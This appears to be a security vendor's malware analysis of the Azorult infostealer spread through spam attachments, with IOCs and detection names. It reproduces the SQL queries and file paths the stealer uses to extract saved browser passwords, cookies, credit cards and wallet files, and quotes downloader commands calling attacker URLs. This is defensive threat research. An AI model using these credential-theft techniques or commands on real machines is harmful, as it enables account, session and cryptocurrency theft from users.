The ASEC analysis team recently discovered that Azorult malware is being distributed through spam mails. Azorult is a kind of Infostealer that accesses a C&C server to receive DLL files and commands used to leak information, and steals information such as user data files and account information to leak it to the server. Besides account information of web browsers and email clients, screenshots, cryptocurrency information, and files designated by the attacker with certain paths and extensions can be collected as well.
Because downloaded commands support a feature to download additional malware, Azorult can also act as a downloader. Once all these processes are done, it deletes itself after leaking information and acting as a downloader, which makes it different from other types of malware. It does not support methods of operation after reboot such as registering a Run key. This means that the malware is deleted after simply leaking information instead of performing additional behaviors by receiving commands from the attacker while staying hidden. Of course, since it can download additional malware, it can act as a medium for other types of malware.
As shown in Figure 1, Azorult is mainly distributed through attached files of spam mails. Since AhnLab once received a compressed file named “Estimate Request_Construction Floor Plan.7z,” we can find out that Korean users are also targets for the attack.
1. Reset
Azorult creates a mutex when it is executed. The string used is created with the following process. First, the malware seeks the privilege of the current process. The attached file is usually double-clicked, so it is executed as a child process of explorer.exe and belongs to a user group. If it is run with an administrator privilege, it belongs to an Administration group. It might be even run with a system privilege in some cases. It returns S, A, U, and G for each function shown below.
Figure 2. Obtaining privilege informationAlso, for MachineGuid, ProductName, UserName, and ComputerName as well as strings added with the previously mentioned 4 strings, the malware uses a different algorithm for each string to create a string as shown below. The function is continuously used later in moments such as sending packets.
| [Machine Guid-based]-[Product Name-based]-[User Name-based]–[Computer Name-based]-[4 Strings-based] Ex) 112xxx26-86C3DFC7-8EBxxx77-DBxxxA24-C539B8C2 |
Figure 3. Creating unique stringThe string that means the privilege found before (one of the characters S|A|U|G) plus the unique string shown above is the string used for creating a mutex. The malware then decodes the encrypted C&C server URL. Lastly, it finds the data to be sent when requesting the C&C server.
This data combines the 0x0355AE data which is the 3-byte XOR key and the unique string created from before that is URL-encoded. Before requesting the C&C server, Azorult sends the data encoded with the key to the server. XOR key is also sent because the C&C server needs to decode what it has received. Or it might also be that the key is sent to allow the server to encode the data it will send.
Figure 4. Encoded unique string used when requesting POST to C&C server
2. Downloading Commands and DLL Files
2.1. Decoding
The malware for the current analysis target received about 4,369KB of encoded data (0x444340) from the C&C server. The data includes commands from the C&C server, multiple DLL files to be used for leaking information, and the string data that the malware will use.
The encoding method is XOR, with 3 bytes XOR used for requesting C&C and additional 4 bytes XOR decoding used. As you can see below, the first 0x80000 size of the initially encoded data is decoded with the hard-coded key value of 0x0355AE. This process is the same as the one previously processed for requesting the C&C server. As such, the entire C&C command located at the very front (existing in between tags <c> and </c>), as well as some parts of the DLL data, is decrypted. The decrypted result is the string encoded with the Base64 encryption.
Figure 6. XOR decoding processNext, the DLL data which was partially decoded (0x80000 starting from the tag <n>) and the DLL data that was not decoded (up to the tag </n>) are decoded with the 4 bytes XOR key. The key used in this process is 0xC8653001. Lastly, there is the string data in between tags <d> and </d>. It is not XOR decoded like the C&C command and exists as the Base64 encoded string form.
2.2. Decoded data
a. Command
The command of the C&C server exists in between tags <c> and </c>. The XOR decoding result shows a string encoded with Base64. Decoding this command with Base64 shows the following commands.
The current analysis target Azorult 6a4824ab00e63c2f1bbf29a24d78b2a4 receives a short command as you can see above, but another type of Azorult (c0e0a9d259bbf9faab7fd5049bf6b662) receives a command as shown below.
| Azorult 1 ] – MD5: 6a4824ab00e63c2f1bbf29a24d78b2a4 – C&C Server URL: http://ciuj[.]ir/masab/index.php Azorult 2 ] – MD5: c0e0a9d259bbf9faab7fd5049bf6b662 – C&C Server URL: http://jamesrlongacre[.]ug/index.php |
The 10 combinations of + and – in the first string are lists of flags that determine the enable status of various information leaking features existing in Azorult. + means enabled, while – means disabled. The flags will be discussed in detail in the information leak part.
Next, the lines starting with F, I, and L mean each command. The F command can designate target paths and extensions to additionally leak user data. The I command can lookup a user’s IP address. Finally, the L command acts as a downloader, downloading additional malware. Each command will be discussed in detail in the C&C command part.
b. DLL files with the information leak feature
DLL files were included in between tags <n> and </n> and encoded with the XOR key. The files decoded with the XOR process mentioned above exist in the form [DLL name]:[DLL binary]<separator>[DLL name]…. Let’s look at the example below. The DLL existing after the DLL separator “|||<[{99C3}]>|||” has the name of “api-ms-win-core-datetime-l1-1-0.dll.” After “:” comes the actual DLL binary.
Figure 8. Decoded DLL data – Separator, DLL name, and DLL binaryThere are 48 decoded DLL files existing in the form shown above, which are dropped in the path \AppData\Temp\[Unique]\. These files are loaded before leaking information and then used. See below for the list.
| api-ms-win-core-console-l1-1-0.dll api-ms-win-core-datetime-l1-1-0.dll api-ms-win-core-debug-l1-1-0.dll api-ms-win-core-errorhandling-l1-1-0.dll api-ms-win-core-file-l1-1-0.dll api-ms-win-core-file-l1-2-0.dll api-ms-win-core-file-l2-1-0.dll api-ms-win-core-handle-l1-1-0.dll api-ms-win-core-heap-l1-1-0.dll api-ms-win-core-interlocked-l1-1-0.dll api-ms-win-core-libraryloader-l1-1-0.dll api-ms-win-core-localization-l1-2-0.dll api-ms-win-core-memory-l1-1-0.dll api-ms-win-core-namedpipe-l1-1-0.dll api-ms-win-core-processenvironment-l1-1-0.dll api-ms-win-core-processthreads-l1-1-0.dll api-ms-win-core-processthreads-l1-1-1.dll api-ms-win-core-profile-l1-1-0.dll api-ms-win-core-rtlsupport-l1-1-0.dll api-ms-win-core-string-l1-1-0.dll api-ms-win-core-synch-l1-1-0.dll api-ms-win-core-synch-l1-2-0.dll api-ms-win-core-sysinfo-l1-1-0.dll api-ms-win-core-timezone-l1-1-0.dll api-ms-win-core-util-l1-1-0.dll api-ms-win-crt-conio-l1-1-0.dll api-ms-win-crt-convert-l1-1-0.dll api-ms-win-crt-environment-l1-1-0.dll api-ms-win-crt-filesystem-l1-1-0.dll api-ms-win-crt-heap-l1-1-0.dll api-ms-win-crt-locale-l1-1-0.dll api-ms-win-crt-math-l1-1-0.dll api-ms-win-crt-multibyte-l1-1-0.dll api-ms-win-crt-private-l1-1-0.dll api-ms-win-crt-process-l1-1-0.dll api-ms-win-crt-runtime-l1-1-0.dll api-ms-win-crt-stdio-l1-1-0.dll api-ms-win-crt-string-l1-1-0.dll api-ms-win-crt-time-l1-1-0.dll api-ms-win-crt-utility-l1-1-0.dll freebl3.dll mozglue.dll msvcp140.dll nss3.dll nssdbm3.dll softokn3.dll ucrtbase.dll vcruntime140.dll |
c. String data
For programs to perform certain features, they need data like strings and codes. The same goes for malware. If there are strings in the data area of the malware without any modification, it becomes easier to figure out its features. So most types of malware have their strings encoded and use them after they are decoded during the execution process.
Azorult is unique in that it does not have most of its strings used in its malicious behaviors in the binary but receives them from the C&C server: strings that are targets for information leak such as “GoogleChrome” and “firefox,” API strings used for leaking information such as “sqlite3_open” and “sqlite3_prepare_v2,” and SQL queries.
The string data is not encoded with the XOR key and exists as the Base64 string in between tags <d> and </d>. If you decode the Base64 string, you can see 208 strings as shown below.
Figure 9. String data encoded with Base64 and existing in between tags <d> and </d>
Figure 10. Decoded string data
3. Stealing Information
Azorult decodes DLL files used to leak information. It then drops and loads them, seeking the API URLs that will be used for the leak. Afterward, it steals information following flags related to information leakage received from the C&C server as you can see below. There are 10 flags in total. Each enables or disables a certain feature.
- Flag: ++++++++-+
| Order | Features |
| 0 | Unconfirmed |
| 1 | Information of various application accounts |
| 2 | Web browser Cookie and AutoComplete |
| 3 | Coin |
| 4 | Skype History |
| 5 | Telegram |
| 6 | Steam |
| 7 | Screenshots |
| 8 | Auto-delete |
| 9 | Web browser History |
The files are saved as a compressed file of the ZIP format in the memory. It is not dropped as a file and exists only in the memory. Yet upon extracting the .zip from the memory before it is sent to the C&C server, you can find the following list of collected information.
| \ …. \Browsers\ …….. \Browsers\Cookies\ …….. \Browsers\AutoComplete …….. \Browsers\History\ …. \Skype\ …. \Telegram\ …. \Steam\ …….. \Steam\Config\ …. \Files\ …….. \Files\User designated directory\Data to be leaked …. PasswordsList.txt …. CookieList.txt …. Scr.jpg …. ip.txt …. System.txt |
Figure 11. Zip file containing stolen user information
3.1. Account Information
– zip file save path: \PasswordsList.txt
Azorult steals account information from various programs. The following list shows programs that are targeted. Note that properties discussed in web browser parts such as Cookie and History are the same for Chromium-based and Mozilla-based web browsers shown below.
a. Web Browser
– Targeted programs: Internet Explorer, Vault (including the latest version of IE and past versions of Edge), Chromium-based web browsers (GoogleChrome, GoogleChrome64, InternetMailRu, YandexBrowser, ComodoDragon, Amigo, Orbitum, Bromium, Chromium, Nichrome, RockMelt, 360Browser, Vivaldi, Opera, GoBrowser, Sputnik, Kometa, Uran, QIPSurf, Epic, Brave, CocCoc, CentBrowser, 7Star, ElementsBrowser, TorBro, Suhba, SaferBrowser, Mustang, Superbird, Chedot, and Torch), and Mozilla-based web browsers (MozillaFireFox, Waterfox, IceDragon, Cyberfox, and PaleMoon)
In past versions of Internet Explorer (7 and 8), the AutoComplete password was saved in the registry HKCU\Software\Microsoft\Internet Explorer\IntelliForms\Storage2. The key’s values are the hash values of website URLs that correspond to account information, with the data of the value being the account information. The data is encoded using DPAI. To decode it, one must know what website is matched to the key.
To know the information, Azorult uses the CUrlHistory COM object as shown below to know the History of IE.
– CUrlHistory CLSID: 3C374A40-BAE4-11CF-BF7D-00AA006946EE
– IUrlHistoryStg2 IID: AFA0DC11-C313-11d0-831A-00C04FD5AE38
It obtains the user account information saved in IE with the method of using URLs found in IE History to know the values saved in \IntelliForms\Storage2 with the CryptUnprotectData() API. It then steals account information of the Edge web browser saved in Windows Vault.
Let’s have Google Chrome as an example among Chromium-based web browsers. The malware extracts the account information from the \AppData\Local\Google\Chrome\User Data\Default\Login Data file with the following SQL query.
> SELECT origin_url, username_value, password_value FROM logins
Let’s have Mozilla Firefox as an example among Mozilla-based web browsers. The malware reads the logins.json file existing in paths such as \AppData\Roaming\Mozilla\Firefox\Profiles\wz0irceq.default-release. The file is a text format, parsing strings for items such as hostname, encryptedUsername, and encryptedPassword. encryptedUsername and encryptedPassword are strings encoded with Base64. As for their decoded results, they can be decrypted with functions of nss3.dll such as PK11_GetInternalKeySlot(), PK11_Authenticate(), and PK11SDR_Decrypt() to know the original account information.
b. Email Client
– Targeted programs: Outlook and Thunderbird
As Thunderbird is Mozilla-based, the same method mentioned for Firefox above is used. For Outlook, the malware extracts values such as EMAIL, POP3, IMAP, SMTP, and HTTP from registry keys shown below.
c. Others
– targeted instant message programs: Psi+ and Pidgn
– targeted FTP client programs: FileZilla and WinSCP
3.2. Web Browser Cookie
– zip file save path: \CookieList.txt and \Browsers\Cookies\[file that will be leaked].txt
If flags for Cookie and AutoFill are enabled, the malware steals Cookie files of IE, Edge, Chromium-based web browsers, and Mozilla-based web browsers. For IE and Edge, it steals *.txt files and *.cookie files from the following paths.
| \AppData\Roaming\Microsoft\Windows\Cookies\ \AppData\Roaming\Microsoft\Windows\Cookies\Low\ \AppData\Local\Microsoft\Windows\INetCache\ \AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\ \AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC#!001\MicrosoftEdge\Cookies\ \AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC#!002\MicrosoftEdge\Cookies\ \AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\ |
Let’s have Google Chrome as an example among Chromium-based web browsers. The malware extracts information from the \AppData\Local\Google\Chrome\User Data\Default\Cookies file with one of the following 2 SQL queries.
> SELECT host_key, name, encrypted_value, value, path, secure, (expires_utc/1000000)-11644473600 FROM cookies
> SELECT host_key, name, name, value, path, secure, expires_utc FROM cookies
Let’s have Mozilla Firefox as an example among Mozilla-based web browsers. The malware extracts information from the cookies.sqlite file existing in paths such as \AppData\Roaming\Mozilla\Firefox\Profiles\wz0irceq.default-release with the following SQL query.
> SELECT host, path, isSecure, expiry, name, value FROM moz_cookies
3.3. Web Browser AutoComplete
– zip file save path: \Browsers\AutoComplete\[file that will be leaked].txt
If flags for Cookie and AutoFill are enabled, the malware steals AutoFill records of Chromium-based and Mozilla-based web browsers. Let’s have Google Chrome as an example among Chromium-based web browsers. The malware extracts information from the \AppData\Local\Google\Chrome\User Data\Default\Web Data file with the following SQL query.
> SELECT name, value FROM autofill
In Chromium-based web browsers, CreditCard information also becomes a target to be stolen. Following the same process, the malware extracts information from the \AppData\Local\Google\Chrome\User Data\Default\Web Data file with the following SQL query.
> SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted value FROM credit_cards
Let’s have Mozilla Firefox as an example among Mozilla-based web browsers. The malware extracts information from the formhistory.sqlite file existing in paths such as \AppData\Roaming\Mozilla\Firefox\Profiles\wz0irceq.default-release with the following SQL query.
> SELECT fieldname, value FROM moz_formhistory
3.4. Web Browser History
– zip file save path: \Browsers\History\[file that will be leaked].txt
If the flag for History is enabled, the malware steals History records of Chromium-based and Mozilla-based web browsers. Let’s have Google Chrome as an example among Chromium-based web browsers. The malware extracts information from the \AppData\Local\Google\Chrome\User Data\Default\History file with the following SQL query.
> SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),\”unixepoch\”) , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000
Let’s have Mozilla Firefox as an example among Mozilla-based web browsers. The malware extracts information from the places.sqlite file existing in paths such as \AppData\Roaming\Mozilla\Firefox\Profiles\wz0irceq.default-release with the following SQL query.
> SELECT DATETIME(moz_historyvisits.visit_date/1000000, \”unixepoch\”, \”localtime\”),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000
3.5. Coin Wallet
– zip file save path: \Coins\autoscan\ and \Coins\Monero\
If the flag for Coin is enabled, the malware steals wallet files for various types of cryptocurrency. First, files saved in the \Coins\autoscan\ folder are those that fit the following conditions as the malware lookups paths within the \AppData\Roaming\ folder.
– “.wallet,” “wallets\.wallet,” “wallet.dat,” “wallets\wallet.dat,” “electrum.dat,” and “wallets\electrum.dat”
Next, files saved in the \Coins\Monero\ folder are those that have their paths known by the malware referencing the wallet_path data of the HKCU\Software\monero-project\monero-core key, those that have .address.txt name added to the previous files and those that have .keys added to their names. Afterward, the malware also steals wallet.dat files and \wallets\wallet.dat files from the paths known by referencing the strDataDir data from the following registry keys.
| HKCU\Software\Bitcoin\Bitcoin-Qt HKCU\Software\BitcoinGold\BitcoinGold-Qt HKCU\Software\BitCore\BitCore-Qt HKCU\Software\Liteoin\Litecoin-Qt HKCU\Software\BitcoinABC\BitcoinABC-Qt |
Lastly, it steals the following cryptocurrency wallet files existing in paths of \AppData\Roaming\ such as \AppData\Roaming\Electrum\wallets\.
– Electrum, Electrum-LTC, ElectrumG, Electrum-btcp, Ethereum, Exodus, Exodus Eden, Jaxx, and MultiBitHD
3.6. Skype
– zip file save path: \Skype\
If the Skype flag is enabled, the malware steals the main.db file from the \AppData\Roaming\Skype\ path. When users use Skype, the logs are saved in the main.db file. Certain tools can be used to restore the Skype record with the file. This means that when the attacker steals the file, Skype-related information such as Skype chat history can be leaked.
Figure 18. Routine for stealing Skype’s main.db file
3.7. Telegram
– zip file save path: \Telegram\
If the Telegram flag is enabled, the malware steals files starting with “D877F783D5” and “map” existing in the \AppData\Roaming\Telegram Desktop\tdata\ path. These files are settings files related to sessions existing in the Telegram PC version and can be exploited by the attacker for stealing sessions.
Figure 19. Routine for stealing Telegram’s session data file
3.8. Steam
– zip file save path: \Steam\Config\[*.vdf], \Steam\[ssfn*]
If the Steam flag is enabled, the malware obtains the Steam path by referencing the SteamPath value of the HKCU\Software\Valve\Steam key and steals “ssfn*” files existing in the path and “*.vdf” files existing in the internal Config folder. These files have the information of sessions and settings of the Steam client. The attacker can exploit these files to access a user’s Steam account.
Figure 20. Routine for stealing information of Steam session information
3.9. Screenshots
– zip file save path: \scr.jpg
If the screenshot flag is enabled, the malware takes a screenshot of the current screen and saves it in the compressed file with the name scr.jpg.
3.10. System info
– zip file save path: \System.txt
Azorult obtains various types of system info and leaks them regardless of C&C commands by default. The following shows the types of information that are leaked.
| MachineID, Malware path, Windows version, Computer name, Resolution, Language, Time, Time Zone, CPU model, Number of CPUs, RAM size, Video card information, List of currently running processes, and List of installed programs |
4. C&C Command
4.1. Command – F
– zip file save path: \Files\[user designated path name]\[file that will be leaked].txt
The F command collects files from the user PC and receives settings for the path and extensions. The following shows 2 examples among F commands received from the C&C server.
The format is as follows:
[ F \t <name of the compressed file> \t <path> \t <extension> \t <max size> \t <subfolder> \t <shortcut> \t <exception path> ]
The files collected by the F command are located at the Files\ path inside the compressed file and saved in the folder with the name of the compressed file designated by the command. For instance, the first command has the data saved in the DOC TXT folder. For paths, environment variables such as %USERPROFILE% and the drive paths starting with “DSK_” are supported. By designating the route path and calling the GetDriveTypeA() function, the command can return the type of the drive path. 2 means removable storage devices such as USB, 3 means normal drives, and 5 means CD-ROM drives. So in the example above, %DSK_23% means that the command will target normal hard drives and USB drives to leak files.
Figure 22. F command – collecting filesThe third part is about extensions of files that will be collected, and the fourth part is the max size of the collected files in the KB unit. Next are 2 flags +|-. The first one decides whether files within subdirectories will be collected or not, and the second one decides if shortcut files (.lnk files) will be collected or not. The keywords located at the last part are the names of folder paths that will not be collected for information leaks.
4.2. Command – L
Another Azorult mentioned above received the L command as shown below.
| L http://jamesrlongacre[.]ug/ds2.exe – * L http://jamesrlongacre[.]ug/ds1.exe – * L http://jamesrlongacre[.]ug/rc.exe – * L http://jamesrlongacre[.]ug/ac.exe – * |
The L command consists of the form <L> \t <URL> \t <+|-> \t <*|URL>. The +|- flags of the third part decide the status of the SW_HIDE flag when downloaded files are executed. If the flag is + (SW_HIDE), the files will be run with their properties hidden.
For the fourth part, the 2 files all received * as the command, but they can download particular URLs. They only download additional malware if the current list of Cookies includes the keyword. As for the current command *, it downloads files regardless of Cookies. Suppose the command received the keyword “AHNLAB.” The following shows the routine of inspecting the keyword in the list of Cookies.
Figure 23. Routine for comparing the list of CookiesThe downloaded files are saved in the name of the URL in the Temp path. If there are files with the same name, the files are downloaded in the ProgramData path instead. If the extension of the downloaded files is .exe, the command runs them using the CreateProcessW() function. If not, the files are run using the ShellExecuteExW() function. The process is repeated for each L command.
Figure 24. Downloader routine
4.3. Command – I
– zip file save path: \ip.txt
The I command received from the current C&C server had the IP address and country code of the infected PC. In this case, the received information is simply saved as the ip.txt file.
| I xxx.xxx.xx7.166:KR |
If there is no IP and country code information of the infected PC in the I command (receiving “?”), the command obtains information by making a query to http://ip-api.com/json and parses the information to save it as the ip.txt file.
Figure 25. Stealing IP information
5. Leaking Collected Information
After obtaining all types of information, Azorult creates a packet to be sent to the C&C server as shown below. The structure of the packet is as follows. The strings attached before the zip file are all URL-encoded. The separator is the string “2C5A87CB-758C-7293-47BC-475C65D699A584C5-7DC6-DC45-12A47C7DB587-F89F-78CD-96CA-FD478543C7F4” which is hard-coded in the binary.
<system info> [separator][separator] <stolen account information> [separator][separator] <stolen Cookies information> [separator][separator] <compressed file>
Figure 26. Packet data before it is XOR-encodedThe first size of 0x80000 is decrypted with the 3 bytes XOR key, just like how the C&C command was decrypted. The key used here is also 0x0355AE. After sending the XOR-encoded data to the server, the malware uses the L command that it received before to perform downloader behaviors.
After all of the processes are done, the malware deletes the created DLL files and the folders within the Temp directory where the files are located. As it auto-deletes following the C&C command, users may not discover any traces of the malware.
6. Conclusion
Azorult malware is distributed through spam mails. Therefore, when there is a suspicious-looking email in the inbox, users must refrain from opening the attachment files within the email. Also, V3 should be updated to the latest version so that malware infection can be prevented.
[File Detection]
– Trojan/Win32.Kryptik.C4217978
– Malware/Win32.RL_Generic.R354530
[Behavior Detection]
– Malware/MDP.Behavior.M3108
[IOC]
– File
6a4824ab00e63c2f1bbf29a24d78b2a4
c0e0a9d259bbf9faab7fd5049bf6b662
– C&C URL
hxxp://ciuj[.]ir/masab/index.php
hxxp://jamesrlongacre[.]ug/index.php
The post Infostealer Malware Azorult Being Distributed Through Spam Mails appeared first on ASEC BLOG.
Article Link: Infostealer Malware Azorult Being Distributed Through Spam Mails - ASEC BLOG